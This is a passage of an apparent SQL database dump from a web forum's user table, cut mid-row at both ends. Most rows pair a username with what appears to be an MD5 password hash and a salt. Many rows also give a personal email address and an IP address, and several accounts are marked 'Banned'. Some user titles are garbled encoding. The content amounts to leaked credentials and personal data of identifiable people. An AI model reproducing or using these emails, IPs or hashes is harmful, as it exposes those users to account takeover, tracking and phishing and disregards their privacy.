'5b0806dbd9736ee52f44f5117b68a2bd', '2014-08-12', '', 0, '', '', '', '', '', '', '', 1, 0, 'Üþôõрðтþр', 0, 1407866580, -1, 1407866661, 1407867120, 0, 0, 0, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'Mz:KtZ.er@V{+l{~K7m[,eZH)R%fln', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (39, 2, '', 0, 'lumbricus', '39e709e713cb3a5fb528926a83825abf', '2014-08-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1407928740, -1, 1442120635, 1442120635, 1428046569, 2258, 20, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 5, 0, '(.RYpbQBl*W<(Pt_^pD+1$&%~Ru_Y[', 0, 0, 0, '', 0, 0, 93, 0, 0, 1, 0, 0, 0, 0, 0, 0, '', ''), (40, 2, '', 0, 'opensc', '5679d72c45c4caea5e9b4ba7897abce9', '2015-03-26', 'cylonzero@yandex.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1407931440, -1, 1438255106, 1438255080, 1409582160, 1873, 3, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 2, 0, 'V8k>XQg+B\"i`eT`uzA?!riVMs]>/Gm', 0, 0, 0, '', 0, 0, 95, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (41, 2, '', 0, '123', '739341597fb0f75ce8ce230461b7705f', '2015-09-20', '', 0, '', '', '', '', '', '', '', 1, 0, 'Member', 0, 1408101960, -1, 1445786886, 1445851503, 1445786886, 2896, 19, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 0, ']=987JL@IiP..J5O0t@#Tp<|Y\'TE$e', 0, 0, 0, '', 0, 0, 64, 0, 0, 3, 0, 0, 0, 0, 0, 0, '', ''), (42, 8, '', 0, 'jerzyboyz', '4ce03897fc5b10dda2feee73c87d5567', '2014-08-19', '', 0, '', '', '', '', '', '', '', 1, 0, '×ðñûþúøрþòðý', 0, 1408441920, -1, 1411259347, 1411404398, 0, 0, 0, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 0, 'E=${jYzqtI[dUh/B@fDT.ejn5&?>?A', 0, 0, 0, '', 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (43, 2, '', 0, 'Saplt', 'db30d7474120fe2d860a5a427afd9530', '2014-08-23', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1408796100, -1, 1409039833, 1409041889, 0, 0, 0, 10, 5, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '_%W=:;:D:44l;.>]-R|(9^%uJHV(4|', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (44, 2, '', 0, 'l3n0', '1d16d91b12dce1a4c53cf565f9718087', '2014-08-24', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1408883160, -1, 1466179509, 1471427686, 1411057864, 2103, 2, 10, 5, '3', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 2, 2, '3{(#7M|\\HPnb6F^yB;H+j,tSYHHN%wnpd', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (102, 2, '', 0, 'mastermind', 'c8af7c98f71dcd31cb5aef96e1298b91', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420474200, -1, 1465099425, 1466546629, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'j:QZ$&G-mTZeT\\[t$kX7\'llAFt_[.CJ~XL', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (111, 8, '', 0, 'Independent', 'f995bbe230bc74387ece272819e8ce21', '2015-01-05', 'c3035004@trbvm.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420479960, 0, 1420480426, 1420667940, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '81.22.133.104', 0, 1, 0, 0, -1, 0, 0, 'eWgx:p=(q)qOg0t\"=k@bz,CM{fZo&a0vBGMa/\"f1kj=Y.H3K$(3', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (114, 2, '', 0, 'xmpp', '058968453491ef2fbcf0825cb755334a', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420480740, -1, 1420480793, 1420480740, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, ';D==/Yl\\qYdXrY!Zj2>ODiJ>X?M-*%', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (115, 2, '', 0, 'trickstr', '5f467d4b92d667ba340212fc290263c1', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420480860, -1, 1420997251, 1421012437, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '9{a3%HG!pqv-g?)G`Qr`bC]2\'T+L_y', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (116, 2, '', 0, 'g0rx', 'edca3c9fc9d51703467d3bbc415585d9', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420481160, -1, 1425728899, 1438260951, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '#oI\"kc%V)ON@Lp.Y2yoBArJL|Y;xQZ', 0, 0, 0, '', 0, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (117, 2, '', 0, 'spawn', 'b3c30c20ba676a1a179ec7c9f9510228', '2015-01-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420484460, -1, 1420484561, 1420485938, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '[Er{VPWi=7IW0*8nz&]0\':?C([%V8}', 0, 0, 0, '', 0, 0, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (118, 8, '', 0, 'pepeasd', '4ea5a9943329a04a64d45e5e5564bee8', '2015-01-07', 'economistawannabe@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648020, 0, 1420648730, 1420657980, 0, 0, 0, 10, 5, '-3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '190.225.82.37', 0, 1, 0, 0, -1, 0, 0, 'vTUNY:`v=2Ud`~I#y7UMoMM-u%l=@$', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (119, 8, '', 0, 'demonic', '5e8658021452526b7b4c55ada4b60580', '2015-01-07', 'hbhmvymn@sharklasers.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648080, 0, 1425295351, 1425305880, 1420649700, 2225, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '199.254.238.139', 0, 1, 0, 0, -1, 0, 0, 'fFdG9\"`-`5f-Uo8kAEoIR3R3GfSHm@#km.b8,&Q?DP2wbo', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (122, 8, '', 0, 'iAbdO', '43a00345860d8e27fa7ad81366d43fd9', '2015-01-07', 'globalinternetnews@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648080, 0, 1420648405, 1420648380, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '178.135.107.245', 0, 1, 0, 0, -1, 0, 0, '~PH9=ovJt$XQFM~&%q/Q#i<@Sc]!y`', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (123, 2, '', 0, 'zer0', 'd58c293b1e440f56aaeed69b6d4165bf', '2015-01-07', 'gokaijou@guerillamail.org', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420648139, 0, 1420648739, 1420649715, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '5.79.86.129', 0, 1, 0, 0, -1, 0, 0, 'mh@,-*\'T-NkD@\\dbJIXY5Zt}\'6G35R', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (124, 8, '', 0, 'mrsxypants', '44223e91b63a7e28b650a83175d81bac', '2015-01-07', 'compwizard.t@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1420648140, 0, 1420648143, 1420648140, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '184.209.8.111', 0, 1, 0, 0, -1, 0, 0, 'g1m\"=q2=W+b!,*\'&]KY46nuj2pL~|b', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (125, 2, '', 0, 'surgeonsblade', '64a22ccd423a70e94961907f7c08a913', '2015-01-07', 'elvir.besic@global.net.ba', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1420648182, 0, 1420648182, 1420648258, 0, 0, 0, 10, 5, '1', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '109.175.97.116', 0, 1, 0, 0, -1, 0, 0, '@lKZw6,H(4XvEASC>94mb\\J>J)t', 0, 0, 0, '', 0, 0, 99, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (134, 8, '', 0, 'dw0rd', 'f3d58628f6996dcd8de8cd1a11f7dffa', '2015-01-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421150700, -1, 1421152567, 1421252520, 1421152440, 2237, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '\\!!blyaajh:QW{5Uw!Lf@>w%@87HMP', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (135, 2, '', 0, 'reversing4', '9d51a78fc775ecc628db65dde826d993', '2015-01-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421156340, -1, 1466041138, 1466632458, 1427668463, 2251, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 5, 0, '~jgBH])}bchM\\`!HK=puiW{L.s@\'\'x', 0, 0, 0, '', 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (136, 2, '', 0, 'y0d4', 'badbd226fe715b33824613665a879ce3', '2015-01-19', 'm45t3r.y0d4@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680612, 0, 1464043417, 1464043417, 0, 0, 0, 10, 5, '1', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '77.243.16.36', 0, 1, 0, 0, -1, 0, 0, '}H>P~Dz!%!Jd|Np^R{4V/+f*s6-txm', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (137, 8, '', 0, 'chirag7766', '8e85fa703414c712ddb6ba8b9bc12c11', '2015-01-19', 'chirag7766@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680620, 0, 1421681129, 1421681100, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '112.196.110.152', 0, 1, 0, 0, -1, 0, 0, '(\"\'I[I{N!/5sT?8iXY(N~QO>T?JMbRXHq(', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (139, 8, '', 0, 'nikocuy', '9ac5c9856c353659b859c7f196ec3f6f', '2015-01-19', 'kevinlie8899@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680680, 0, 1464043482, 1464043482, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '139.195.63.2', 100, 1, 0, 0, -1, 0, 0, ')3`()Dp7Q@3=X`&c)Sj,A+lzq((n#N', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (140, 8, '', 0, 'hok3', '314a000c890ce14db8b1c04276a516a2', '2015-01-19', 'xhokex@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680680, 0, 1421680710, 1421680680, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '186.37.202.33', 0, 1, 0, 0, -1, 0, 0, '3jb%\"4D5P|uV`}*K+KVwFI~M8#{u/]', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (141, 8, '', 0, 'monkeyfromthejungle', 'c8ec27d1d127ad4e2e9daa9e9d6f821a', '2015-01-19', 'm_krzywy@o2.pl', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680680, 0, 1421680736, 1421680860, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '31.172.185.131', 0, 1, 0, 0, -1, 0, 0, 'uD,,9`JPK$+RQF%y[VFr=t\\2LH.MoQ', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (142, 8, '', 0, 'chikonino', '5cc8510178f215d38fdea9e7e399794f', '2015-01-19', 'saidanikhaled@ymail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680740, 0, 1421680767, 1421681460, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '105.101.50.152', 0, 1, 0, 0, -1, 0, 0, '\\[d5CBjp:xCpLje}K=KDuOhHqK+OY0', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (143, 2, '', 0, 'SADAB', '0176c95cc4c80f4e496cdd73f3461e04', '2015-01-19', 'SADAB6825@GMAIL.COM', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680780, 0, 1421680780, 1421681451, 0, 0, 0, 10, 5, '5.5', 0, 0, 0, 0, 0, 45091927, '07-28-1999', '1999-07-28', -1, -1, '117.225.127.50', 0, 1, 0, 0, -1, 0, 0, '/7<_a?i5p1:jkp1_.\'<@RcM!S~J:t!', 0, 0, 0, '', 0, 0, 170, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (144, 2, '', 0, 'r0ckcrash', '0fbc0181dbd9f6e55cc2b0f4914b9344', '2015-01-19', 'r0ckcrash@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680781, 0, 1421680781, 1421680891, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '187.192.208.204', 0, 1, 0, 0, -1, 0, 0, 'rD.73{.AO2m{WWLMr;RVHOwh};vS*|-Xv9-M6$Ao]j9!7a$W*', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (148, 2, '', 0, 'greptodeath', 'b15969c0f90d4b95c72f625ceeb423e5', '2015-01-19', 'osdifum23lkfsd@openmailbox.org', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421680930, 0, 1425995359, 1440515301, 0, 0, 0, 10, 5, '2', 0, 0, 0, 0, 0, 45091863, '', '0000-00-00', -1, -1, '62.210.74.143', 0, 1, 0, 0, -1, 0, 0, ',G@Hc$&l|,Ip*?rvZP)iVpsO:*@bjr', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (149, 8, '', 0, 'JLCO', 'f1f48dea24ad6b767475ed6dab7da8ee', '2015-01-19', 'jolucaor@live.com', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1421680920, 0, 1421680957, 1421680980, 0, 0, 0, 10, 5, '-5', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '181.39.31.18', 0, 1, 0, 0, -1, 0, 0, 'er=ixh]qSFQeq=]Z\'Z56[ga1@oQx,=', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (150, 2, '', 0, 'Omega', '1e41787c7d8cfc9ca4effba5b3198984', '2015-01-19', 'omeganuller@unseen.is', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421681022, 0, 1464042682, 1464042682, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '112.135.171.11', 0, 1, 0, 0, -1, 0, 0, 'wPNq>B.``cJ1F;S2GnoJFYb', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (154, 2, '', 0, 'TetraQ', 'fd18206a9d8efab97204fce15fcbf171', '2015-01-19', 'sonarius@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1421681239, 0, 1454706845, 1454706845, 1422274910, 2246, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '79.134.209.106', 0, 1, 0, 0, -1, 0, 0, 'dttZJsWpf%qyxR=m4HUMfOXWp', 0, 0, 0, '', 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (161, 2, '', 0, 'negeeb', 'fc3ca705c31f797349ceaafd2e338a5d', '2015-03-27', 'negeeb@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1427456820, -1, 1472797237, 1473327317, 1453453075, 2980, 2, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'W3v{)srsxT`a62,6CfP/n\"c,!BnED=', 0, 0, 0, '', 0, 0, 80, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (162, 2, '', 0, 'm0rivrty', 'a316385e10f39beaafeb0d4a0185790b', '2015-03-31', 'm0rivrty@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1427822040, -1, 1444196347, 1444198291, 1427831557, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '@Q|xqb\"aJ;@+|7:\'u|z)y0c\'Nf>N.l', 0, 0, 0, '', 0, 0, 143, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (163, 2, '', 0, 'Fuhrer666', 'ac27cfc876680eb5127646234fbe0467', '2015-06-25', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435253220, -1, 1474248758, 1474248758, 1443045788, 2824, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '!Xy*XR^tgXZbF9/$xxoOP?KSx@ax|Q', 0, 0, 0, '', 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (164, 2, '', 0, '*Hash*', '41599d14321f9f7c196e5ed48dea5234', '2016-05-05', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435594080, -1, 1467938046, 1469896978, 1449588720, 0, 4, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 3, 0, 'dPYXlpjI/{@~hh>fXSbwgl>j(tR`;b', 0, 0, 0, '', 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (165, 2, '', 0, 'Versus71', 'adfb30af0ed9d89eb85ec7457ab04657', '2015-06-30', 'xakep71@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435678980, -1, 1442981230, 1443171699, 1442089093, 2697, 2, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 2, 0, 'a]6Lzc~#fL1^L\"Qp5\\aALqIX/5!l[g', 0, 0, 0, '', 0, 0, 71, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (166, 2, '', 0, 'gilgil', 'e0f2ba360e27d5e307169d2ab793bc0c', '2015-07-01', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1435748280, -1, 1465842134, 1465842134, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 0, 'v0%6o:%H6u=r%M@#dvL%oQeiYR}x2R', 0, 0, 0, '', 0, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (168, 2, '', 0, 'moloon', '3009fd6bd0efc54d36d3819ca0dca82f', '2015-07-30', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1438252740, -1, 1443430542, 1447759915, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'i]sA*7IS!bJE3>j*3sj1AjC!?AJZ+!', 0, 0, 0, '', 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (169, 2, '', 0, 'intrip', '812d47c80a35d5737550593adae6345e', '2015-08-08', 'iintrip@yandex.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1439047080, -1, 1465211768, 1465293488, 1447331945, 2921, 1, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '-Yv73Rfwj~S', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (176, 2, '', 0, 'GreenMan', 'cb57fd43763244eec0c438e88031fe2a', '2015-09-02', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1441204080, -1, 1441205093, 1442128017, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, ':V$@yf?dX:(B3}oa0+OusELUQUS}z\"', 0, 0, 0, '', 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (177, 2, '', 0, 'ElihuYale', 'e37d3745540cdee62b3a4da8f14ea52c', '2015-09-16', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442435340, -1, 1461082316, 1461948298, 1443374539, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '\"a.-*>-cxaC2^c?JgRqA0.)449$!PE', 0, 0, 0, '', 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (178, 2, '', 0, 'dark001', '0c1343f361d10e226cf026c3abf106c9', '2015-09-16', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442435460, -1, 1466429858, 1472107160, 1457865814, 2979, 4, 10, 5, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 10, 0, 'IEWFKqjal:3l4^Y\'6ZfI[l>*>|\"M.$', 0, 0, 0, '', 0, 0, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (179, 2, '', 0, 'sisi1337', '7145391329ed7ee633fc4e612760e4e6', '2015-09-18', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442575920, -1, 1442575973, 1442575920, 0, 0, 0, 10, 5, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'R6N7e}^', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (181, 2, '', 0, 'deadeye', '81a20eacfab8a887a7f2a56519856fae', '2015-09-20', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442745600, -1, 1458821654, 1458908324, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'd8(}Mn^TeVRS\"7.&e`6Lrj^bQ@vt8o', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (182, 8, '', 0, 'sAv', '1b8e58a357915a15e3daa04d9f2a29b4', '2015-09-21', '', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1442805420, -1, 1442845798, 1443026220, 1442835900, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '&mZdbNB7tvth+Ox{x5LL;yM&8Xnb2g', 0, 0, 0, '', 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (183, 2, '', 0, 'zoom', '5db6285e1ca7873c0c0c8c860da2b87f', '2015-09-21', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442831220, -1, 1442937801, 1443030198, 1442833514, 2778, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 1, '\'tr-Mt~~j{%N_tI)z1izj?=\'o1Qbs}', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (184, 2, '', 0, 'wearymax', '4e8ff18ac332538499796dd4792451ea', '2015-09-21', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442848080, -1, 1442848080, 1442993933, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '@W%*JC|?1#0&Fn#1-{q\"*/hvrSEm4G', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (185, 2, '', 0, 'AD0', '7de29677189f90d1b4c6c42e9ac6c606', '2015-09-22', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1442924820, -1, 1443087666, 1453209982, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '=:^Q$&U*F44p<7~6nQC?G,`l@', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (187, 2, '', 0, 'r00t1337', 'aa14f7aa817fa5458e9980bbfb8f842f', '2015-09-24', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1443129300, -1, 1443214599, 1443720098, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '43[Gks;O;FX2mcj>N#Lp4wb~gD.rsQ', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (188, 2, '', 0, 'DocXor', '974de389ae66767386d2ef37500ca9a8', '2015-10-03', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1443897900, -1, 1445343499, 1447770120, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'foZtIfLQqD4a6XeO6e\'!@GJ2Phb\\rc', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (189, 2, '', 0, 'BlackOS', '20b11b899963cc35d87cf3a1ff45d01a', '2015-10-10', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1444496160, -1, 1444496184, 1444496160, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'i\\aX8AAy{vp?-z7h-{rOM@iFNZw$XB', 0, 0, 0, '', 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (190, 2, '', 0, 'Str3am', '7b2a983146c6317f235d7228c410bb1e', '2015-10-27', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1445942100, -1, 1446482142, 1447945856, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 